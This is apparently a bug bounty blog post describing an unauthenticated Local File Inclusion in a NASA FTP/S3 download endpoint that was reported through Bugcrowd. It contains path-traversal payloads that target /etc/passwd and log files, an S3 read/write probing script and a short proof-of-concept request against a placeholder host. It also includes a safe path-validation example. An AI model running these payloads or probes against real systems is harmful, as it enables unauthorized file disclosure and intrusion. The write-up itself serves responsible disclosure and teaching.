Introduction
When it comes to hacking, persistence is key. Sometimes, an initial vulnerability might seem insignificant, but with enough time and creative thinking, it can turn into a critical security issue. In this blog post, I will walk you through how I discovered a Local File Inclusion (LFI) vulnerability that earned me a P1 severity rating on Bugcrowd.
But before diving into the technical details, let’s first understand what Local File Inclusion (LFI) is.
What is Local File Inclusion (LFI)?
Local File Inclusion (LFI) is a server-side vulnerability that allows an attacker to include local files on the server. It usually occurs when a web application dynamically loads files without properly validating the input. If exploited, an attacker can read sensitive system files, gain access to source code, or in some cases, achieve Remote Code Execution (RCE).
Common payloads for testing LFI vulnerabilities include:
../../../../etc/passwd
../../../../etc/hosts
../../../../var/log/apache2/access.log
By leveraging such attacks, an attacker can retrieve sensitive information and potentially escalate their privileges within the system.
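To make the mechanics concrete, here is a minimal, purely illustrative Python sketch (not code from any real target) of how this class of bug typically appears, and how the traversal payloads above escape the intended directory:

```python
import os

# Illustration only: a naive file-download handler that joins user input
# onto a base directory without validation.
BASE_DIR = "/var/www/app/files"

def load_file_unsafe(user_path: str) -> bytes:
    # "../" sequences in user_path let the final path escape BASE_DIR.
    full_path = os.path.join(BASE_DIR, user_path)
    with open(full_path, "rb") as f:
        return f.read()

def load_file_safe(user_path: str) -> bytes:
    # Resolve the path and verify it still lives under BASE_DIR.
    full_path = os.path.realpath(os.path.join(BASE_DIR, user_path))
    if not full_path.startswith(BASE_DIR + os.sep):
        raise ValueError("path traversal attempt blocked")
    with open(full_path, "rb") as f:
        return f.read()

# load_file_unsafe("../../../../etc/passwd") would happily return /etc/passwd,
# while load_file_safe() rejects the same payload.
```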
Now, let’s dive into how I leveraged LFI to hack NASA.
The Beginning: An Initial Useless Bug
Back in 2020/2021, before NASA joined Bugcrowd’s VDP (Vulnerability Disclosure Program), I had already found and reported numerous vulnerabilities in their systems, including:
- Reflected & Stored XSS
- Insecure Direct Object References (IDOR)
- Personally Identifiable Information (PII) Disclosure
- Other critical security flaws
However, I wasn’t satisfied. I wanted something bigger, something that could truly make an impact. So I kept testing the same domain for months, hoping to find a high-impact vulnerability.
At first, I discovered an XSS vulnerability, but unfortunately, it was a Self-XSS, meaning it wasn’t exploitable in any meaningful way. Not even CSRF or Clickjacking could be leveraged to weaponize it. It was a dead end.
But I didn’t stop there.
Understanding the S3 Bucket
Before moving forward, let’s briefly explain what an S3 bucket is.
Amazon S3 (Simple Storage Service) is an object storage service widely used for storing and retrieving files in the cloud. Permissions on an S3 bucket determine whether it is public or private, and whether it allows read and/or write access. In this case, I discovered that the S3 bucket used by NASA was readable but NOT writable.
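As a rough illustration of how read and write access can be checked independently, here is a short boto3 sketch; the bucket name is hypothetical, and the calls simply attempt a listing and a small test upload with whatever credentials the caller has:

```python
import boto3
from botocore.exceptions import ClientError

# Hypothetical bucket name, used purely for illustration.
BUCKET = "example-target-bucket"
s3 = boto3.client("s3")

def can_read(bucket: str) -> bool:
    try:
        s3.list_objects_v2(Bucket=bucket, MaxKeys=1)
        return True
    except ClientError:
        return False

def can_write(bucket: str) -> bool:
    try:
        s3.put_object(Bucket=bucket, Key="write-test.txt", Body=b"test")
        # Clean up if the write unexpectedly succeeds.
        s3.delete_object(Bucket=bucket, Key="write-test.txt")
        return True
    except ClientError:
        return False

print("readable:", can_read(BUCKET))
print("writable:", can_write(BUCKET))
```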
Finding the Key Vulnerability: LFI in an FTP Integration
While continuing my testing, I came across a user registration page that allowed interactions with a planetary database. Naturally, I started testing for SQL injection, but had no luck; NASA’s defenses there were solid.
Then something interesting caught my attention. There was a video tutorial explaining how users could query the database. Within the tutorial, I noticed that files were being downloaded from an FTP server linked to an S3 bucket, the same readable-but-not-writable bucket described above.
I then initiated passive crawling and carefully analyzed the Burp Suite requests. One specific request stood out, and that’s where the real breakthrough happened.
Exploiting the Vulnerability
The request I found was responsible for downloading .TAR files from the FTP server, which was backed by S3. However, it wasn’t a standard GET request, so Burp Suite’s crawler didn’t pick up the parameter automatically.
Upon intercepting the request, I noticed a path in the request body:
/FTP/some/some/some/some/file.tar.gz
This path was the value of the file parameter.
After further testing, I realized I could manipulate the file path within the parameter. So, I decided to try classic LFI payloads:
/etc/passwd
To my surprise, I received a full response containing the system’s /etc/passwd file.
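For illustration, replaying that request with the path swapped can be scripted in a few lines. The sketch below assumes a hypothetical endpoint URL; only the file parameter and the payloads reflect what I actually tested:

```python
import requests

# Hypothetical endpoint URL; the real one is withheld. The "file" parameter
# name matches the request body parameter described above.
URL = "https://target.example/download"

for payload in ["/etc/passwd", "../../../../etc/passwd"]:
    resp = requests.post(URL, data={"file": payload}, timeout=10)
    print(payload, "->", resp.status_code)
    print(resp.text[:200])  # look for "root:x:0:0:" to confirm the read
```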
The Impact and Reporting
After confirming the vulnerability, I checked if I could write to the S3 bucket and potentially upload malicious scripts. Unfortunately, the bucket was not writable.
Still, the LFI attack alone was severe enough, as it allowed me to access:
- System files (/etc/passwd, /etc/hosts)
- Configuration details about the backend environment
- Potentially sensitive logs containing credentials or API keys
I stopped my testing at this point, as further exploitation would go beyond the responsible disclosure scope. However, based on the information I retrieved, it was highly likely that this could be escalated into Remote Code Execution (RCE).
I documented everything thoroughly and submitted my report to Bugcrowd, where it was quickly validated and triaged as a P1 (Critical) vulnerability.
To make things even more interesting, I initially assumed that this vulnerability was only accessible to authenticated users. However, after further testing, I discovered that it was accessible even to unauthenticated users. This meant that anyone could exploit it with a simple cURL request, making the impact even more critical.
PoC of Unauth LFI:
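The proof of concept boils down to a single request with no session or cookies attached. The sketch below is illustrative only: the URL is a placeholder, and the equivalent cURL command is shown in a comment:

```python
import requests

# Illustrative only: placeholder URL, no cookies or auth headers attached.
# Roughly equivalent to:
#   curl -s -X POST -d "file=/etc/passwd" https://target.example/download
resp = requests.post(
    "https://target.example/download",
    data={"file": "/etc/passwd"},
    timeout=10,
)
print(resp.status_code)
print(resp.text[:500])  # contents of /etc/passwd if the target is vulnerable
```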
Conclusion
This experience highlights the importance of persistence in security research. What started as a seemingly useless bug eventually led me to a misconfigured FTP/S3 integration, which in turn led to LFI and potential RCE.
Key takeaways from this research:
- Never dismiss an initial finding: a vulnerability that seems low-impact at first might be a gateway to something much more severe.
- Always think outside the box: I found the vulnerability through a video tutorial, something most people would overlook.
- Understanding request patterns is crucial: Burp Suite couldn’t detect the vulnerable parameter, but manual testing made the difference.
- Responsible disclosure is key: even though I could have explored RCE, I stopped at LFI to ensure ethical reporting.
- Always test authentication assumptions: the vulnerability turned out to be exploitable without authentication, making it even more severe.
This vulnerability earned me a P1 severity rating on Bugcrowd, proving that creativity and patience can lead to huge security discoveries. If you’re passionate about ethical hacking, keep testing, keep learning, and never give up.